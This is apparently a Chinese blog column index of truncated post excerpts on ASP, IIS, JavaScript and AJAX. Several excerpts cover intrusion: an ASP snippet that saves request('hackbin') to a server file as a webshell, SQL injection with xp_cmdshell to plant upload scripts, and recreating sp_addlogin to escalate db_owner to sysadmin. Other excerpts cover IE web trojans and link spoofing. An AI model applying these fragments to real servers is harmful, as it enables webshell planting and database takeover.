蓝法典的专栏

先头看到欲望之翼的self.window的办法 其实我一直有个从来没给任何人说的办法: 玩了好久了公布了呵呵: sub changeq() if form1.loc.value="" or form1.who.value="" then msgbox "没有加入地址或用户名?" exit sub end if loc=form1.loc.value user=form1.who.value st

C:分区部分：c:/administrators 全部iis_wpg 只有该文件夹列出文件夹/读数据读属性读扩展属性读取权限c:/inetpub/mailrootadministrators 全部system 全部service 全部c:/inetpub/ftprooteveryone 只读和运行c:/windowsadministrators 全部Creator owner不是继承的只有子文件夹

常用Windows9x的朋友一定对Rundll32.exe和Rundll.exe这两个档案不会陌生吧，不过,由於这两个程式的功能原先只限於在微软内部使用，因而真正知道如何使用它们的朋友想必不多。那么好，如果你还不清楚的话，那么就让我来告诉你吧。      首先，请你做个小实验（请事先保存好你正在执行的程式的结果，否则...）：点击“开始－程式－Ms－Dos方式”，进入Dos视窗，然後键入rundl

真的是高手`强`顶` 下面是一位高手整理的问题精华，大家好好看看吧，收获肯定很大的! 　　1.如何让asp脚本以system权限运行? 　　修改你asp脚本所对应的虚拟目录，把"应用程序保护"修改为"低".... 　　2.如何防止asp木马? 　　基于FileSystemObject组件的asp木马 　　cacls %systemroot%/system32/scrrun.dll /e /d gu

对于国内外的很多新闻，BBS和电子商务网站都采用ASP+SQL设计，而写 ASP的程序员很多（有很多刚刚毕业的），所以，ASP+SQL的攻击成功率也比较高。这类攻击方法与NT的版本和SQL的版本没有多大的关系，也没有相应的补丁，因为漏洞是程序员自己造成的，而且大多数讲解ASP编程的书上，源代码例子就有这个漏洞存在，其实只是一些合法的ASP对SQL的请求，就留下后患无穷！ 这种攻击方法最早源于‘or

17173网站注入后提升权限的一些提示制作人：丁林QQ:109295766网站:www.22tian.com-------------------------------------------------------------------------------现在网站注入是当今最流行的网站入侵技术了,国内各大网站也都存在注入,或许是觉得这些网站比较大就不会存在漏洞,也没有人去检测他们吧!不要

一、HTTP码应码响应码由三位十进制数字组成，它们出现在由HTTP服务器发送的响应的第一行。响应码分五种类型，由它们的第一位数字表示：1.1xx：信息，请求收到，继续处理2.2xx：成功，行为被成功地接受、理解和采纳3.3xx：重定向，为了完成请求，必须进一步执行的动作4.4xx：客户端错误，请求包含语法错误或者请求无法实现5.5xx：服务器错误，服务器不能实现一种明显无效的请求下表显示每个响应码

1) Sliding Panels For jQuery - Element can start open or closed and will be toggled from their own original position.2) jQuery Collapse -A plugin for jQuery to collapse content of div containe

RIA（富Internet应用）从来不曾是多么重量级的东西，几年前，开发者企图创建一种超越常规的 Web 体验时，比如仪表盘或一些特殊效果，他们已经有一些初步的工具可用，那些构成 AJAX 的技术，以及基于 Flash 的方案已经初露锋芒。如今，Flash 成了 Adobe 的一部分，AJAX 无处不在，微软和 SUN 也竞相加入，RIA 成为主流。作为 RIA 的轻量级组成部分，众多开源库变得炙

Tips : 1: A nested list must have a or   element. 2.a href="mailto:user@javablackbelt.com">Usera>The possible optional parameters include "subject", "body", "cc" and "bcc". 3. Display

ajax大多数是通过服务器端语言来获取所需的数据，javascript发出请求，服务器将查询数据库然后返回数据。数据可以通过几种形式返回。如果他是结构化的，你可以用xml或json格式。如果他是非常简单的数据，例如文本，一般人们直接返回这种数据。创建一个xmlhttp对象Code highlighting produced by Actipro CodeHighli

  javascript中的继承和Closures实现继承的两种方法使用"call"函数，call允许我们在一个上下文环境中调用另外一个函数。我们在cat和dog类中调用animal类。 Code highlighting produced by Actipro CodeHighlighter (freeware)http://www.C

  正则表达式验证表单Code highlighting produced by Actipro CodeHighlighter (freeware)http://www.CodeHighlighter.com/-->function validateForm(){    var email = document.forms.tutfor

  HTML DOM图片翻转效果Code highlighting produced by Actipro CodeHighlighter (freeware)http://www.CodeHighlighter.com/-->img src="button_off.gif"   onmouseover="this.s

  window全局对象的常用属性属性描述window.locationreturns the current URL for the window.window.opener如果窗口是由其他窗口打开(使用window.open), 这个属性返回父窗口的值MSIE: window.screenTop

推荐2个学习地址 Javascript:http://www.w3schools.com/js/default.asp AJAX:http://www.w3schools.com/Ajax/Default.Asp很不错，可以循序渐从上往下看，对初学者很有帮助。SQL:http://www.w3schools.com/sql/default.a

  javascript中面向对象的实现javascript中的函数可以充当类的角色，我们用函数的prototype完成类的功能。首先了解javascript中的对象是如何工作的，对象允许你定义一个变量然后可以在变量上设置任意多的属性让我们看下一个简单的例子 Code highlighting produced by Actipro Code

整合你的站点入口  大家也许经常在网上看到这样的路径(http://www.aaa.com/aaa/bbb/aaa?id=5),让人不解,这样的网站的实现方式有几种可能性:1、隐藏文件的扩展名，对这种做法的好处，众说纷纭，不过个人觉得没有必要；2、用了网站的重定向规则，实现虚拟路径；3、强制文件解析的方式，实现虚拟路径。用第2/3种方法可以实现网站的统一接口，合理的整合网站，更好的体现网站的安全性

把asp程序作成dll很多好处，但是有一点，该dll必须注册才能在asp中调用。如果是自己的服务器那还好，但如果是租用的虚拟服务器，就没办法使用了。怎样在远程主机上注册我们的dll呢？在服务器端使用Shell！！！ 让我们先将自己的dll文件通过ftp或http上传到服务器上，然后作一个asp程序，调用WScript.Shell来  执行regsvr32命令：  Set oShell = Crea

CMS是Content Management System的缩写，意为"内容管理系统"。 　　CMS具有许多基于模板的优秀设计，可以加快网站开发的速度和减少开发的成本。 　　CMS的功能并不只限于文本处理，它也可以处理图片、Flash动画、声像流、图像甚至电子邮件档案。 　　CMS还分各个平台脚本种类的。 　　 　　内容管理系统是企业信息化建设和电子政务的新宠，也是一个相对较新的市场，对于内容管理

例:把E:/web/目录下的所有东西打包为1.rar放到E:/web/目录下,以便下载C:/Program Files/WinRAR/Rar.exe a -k -r -s -m1 E:/web/1.rar E:/web/参数说明:a 添加文件到压缩文件中-k 锁定压缩文件-s产生固体存档,这样可以增大压缩比-r包括子目录-m1 设置压缩比    -m0   存储     添加到压缩文件时不压缩

SQL Server 数据库的备份与恢复选择操作：备份　恢复数据库名：">文件路径：(备份或恢复的文件路径,备份成EXE主要为了方便下载,活活..)dim sqlserver,sqlname,sqlpassword,sqlLoginTimeout,databasename,bak_file,actsqlserver = "localhost" sql服务器sqlname = "sa" 用户名s

//--> 主页，然后查找与所需信息相关的链接。 HTTP 500.100 - 内部服务器错误 - ASP 错误 Internet 信息服务 技术信息（适用于支持人员） 错误类型： Dim bakCodepage bakCodepage = Session.Codepage Session.Codepage = 936 Response.Write Server.HTMLEncode(o

不知道大家看过这篇文章没有，可以在db_owner角色下添加SYSADMIN帐号，这招真狠啊，存在MSSQL注射漏洞的服务器又要遭殃了。方法主要是利用db_owner可以修改sp_addlogin和sp_addsrvrolemember这两个存储过程，饶过了验证部分。具体方法如下：先输入drop procedure sp_addlogin,然后在IE里面输入create procedure  sp

篇首语：原来改mdb为asp就能防下载是鬼话。  引子：昨天和animator试验了一下，把data.mdb文件改名为data.asp文件后放在wwwroot目录里。然后在IE中输入data.asp路径后，发现IE显示一片空白，右键->察看源文件，跳出记事本，将内容另存为.mdb文件，用ACCESS打开，发现需要密码，也就是说至少文件头被破坏。  然后用Flashget试验下载data.asp文件

据说来自http://www.zone-h.org/但我去没找到的说……以下代码：www.163.com保存为一个htm文件就可以了。运行试试，状态栏也显示www.163.com，实际上指向http://blog.youkuaiyun.com/psyl/下面是代码运行后的样板，看看吧：

简介技巧 1：在 Web 服务器上缓存常用数据 技巧 2：在 Application 或 Session 对象中缓存常用数据 技巧 3：在 Web 服务器磁盘上缓存数据和 HTML 技巧 4：避免在 Application 或 Session 对象中缓存非灵活组件 技巧 5：不要在 Application 或 Session 对象中缓存数据库连接 技巧 6：妙用 Session 对象 技巧 7：在

信息来源：icyfox文章作者：冰狐浪子（测试页面:http://www.godog.y365.com/runexe/icyfox.htm，此处所运行的程序不是木马！)　　既然要打造完美的ＩＥ网页木马，首先就必须给我们的完美制定一个标准，我个人认为一个完美的ＩＥ网页木马至少应具备下列四项特征：　　一：可以躲过杀毒软件的追杀；　　二：可以避开网络防火墙的报警；　　三：能够适用于多数的ＷＩＮＤＯＷＳ操

最近这几天在研究Eclipse插件的配置，也参考了网上的一些帖子，终于把Eclipse+Tomcat+Lomboz配置成功了，下面写出我的配置过程，有什么不妥之处请大家指教。一，下载所需的各种工具和插件（以本机下载的版本举例）j2sdk-1_4_2_01eclipse-SDK-3.0-win32jakarta-tomcat-5.0.16（也可以是其他版本，最好是4。0以上的）Lomboz301em

公告插入==========================================================在本地建立个提交文件 set lP=server.createObject("Adodb.Stream") lP.Open lP.Type=2 lP.CharSet="gb2312" lP.writetext request("hackbin") lP.SaveToFile

SQL注入后，如何上传木马，一直是比较头疼的事，我这里提供上传木马的一种另一种方法。1、SQL注入的时候，用xp_cmdshell 向服务器上写入一个能写文件的asp文件。文件内容：Set objFSO = Server.createObject("Scripting.FileSystemObject")Set objCountFile=objFSO.createTextFile(request(

本文描述了如何通过WEB入侵获得freebsd 4.0的root权限。 文章主要以教育为目的，希望各位观者不要使用本文中的一些方法及程序，危害网络的安全。 作者：lovehacker 联系方式：lovehacker@263.net 网站地址：http://www.chinansl.com 版权属安盟信息科技有限责任公司所有，允许转载，但需保持文章的完整性。 很偶然的一个机会，看到了一个网站，页面清

其实有时候渗透的时候很需要却要去自己机器上COPY散列,很麻烦.还不如这个来的直接点呢...PS:MD5.ASP自己找去嘿~~DVBBS的Include目录下就有的以下是代码程序代码：Public function ServU(strpass) Randomize AA = chr(Int((97 - 122 + 1) * Rnd() + 122)) BB= lcase(chr(Int((65 -

随着教育信息化进程的推进，各类教育网站大量涌现。由于教育网站大多是学校计算机教师自己开发管理的小型网站，普通存在着设备、技术、专业人员不足的问题，网站自身存在漏洞，常常成为黑客攻击的目标，严重影响了正常业务的开展。这里，笔者希望通过对教育网站所遭遇的三次黑客入侵的剖析，来分析黑客常用的入侵方法和手段。　　第一次遭遇入侵　　1. 入侵现象：2004年春节，网站的公告栏上突然出现“此论坛有漏洞，请管理

作者：阿酷  http://www.coolersky.com/本来不打算把这个不成功的入侵写出来的，后来有几个朋友想看，既然能在内部交流，也没有什么见不得人的，索性发出来，初学者可以借鉴一点经验，高手可以在此基础上作更多尝试，我也想多学点东西。    27日晚看到天天网的一片报道：中国银行网站再次遭遇克隆 假网站远在北美，本站转载路径：_blank>http://www.coolersky.co

  今天无意看到这技术，挺时髦的东西，两年前淘宝就已经在使用，看来我是比较落伍了，哈。google首页就采用了这种技术，把图片集中到一起，一次load分次调用,taobao，新浪，搜狐等都使用了此技术。 highlight,put it away for use later. 虽然以现行的网络速度1，200K大小的图片不影响速度，但如果能结合AJAX,CSS把速度再提升到极致，相信最终受益的还是t